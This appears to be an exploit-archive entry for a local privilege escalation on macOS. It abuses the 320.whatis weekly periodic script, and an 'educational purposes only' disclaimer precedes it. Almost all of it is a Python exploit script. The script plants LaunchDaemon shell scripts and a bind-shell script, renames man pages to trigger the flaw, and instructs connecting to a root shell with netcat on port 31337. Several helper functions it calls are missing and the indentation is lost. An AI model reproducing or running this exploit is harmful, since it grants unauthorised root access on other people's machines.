Exploits / Vulnerability Discovered : 2020-05-12 |
Type : local |
Platform : macos
This exploit / vulnerability Macos 320.whatis script privilege escalation is for educational purposes only and if it is used you will do on your own risk!
def create_quick_scripts():
create_scripts_dir()
print("[i] Creating script file to be called by LaunchDaemon")
f = open('/Applications/Scripts/sample.sh','w')
f.write(sh_quick_content)
f.close()
os.system('chmod +x /Applications/Scripts/sample.sh')
def create_reboot_scripts():
create_scripts_dir()
print("[i] Creating script file to be called by LaunchDaemon")
f = open('/Applications/Scripts/sample.sh','w')
f.write(sh_reboot_content)
f.close()
os.system('chmod +x /Applications/Scripts/sample.sh')
print("[i] Creating python script for bind shell")
f = open('/Applications/Scripts/bind.py','w')
f.write(python_bind_content)
f.close()
def rename_man_pages():
for root, dirs, files in os.walk("/usr/local/share/man"):
for file in files:
if file[0] in "0123456789": #if filename begins with a number
old_file = os.path.join(root, file)
new_file = os.path.join(root, 'a' + file)
os.rename(old_file, new_file) #rename with adding a prefix
print("[i] Renaming: " + os.path.join(root, file))
def main():
if len(sys.argv) != 2 :
print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"
sys.exit (1)
if sys.argv[1] == 'quick':
create_man_file()
create_symlink()
create_quick_scripts()
rename_man_pages()
print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist"
elif sys.argv[1] == 'reboot':
create_man_file()
create_symlink()
create_reboot_scripts()
rename_man_pages()
print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337"
else:
print "[-] Invalid arguments"
print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"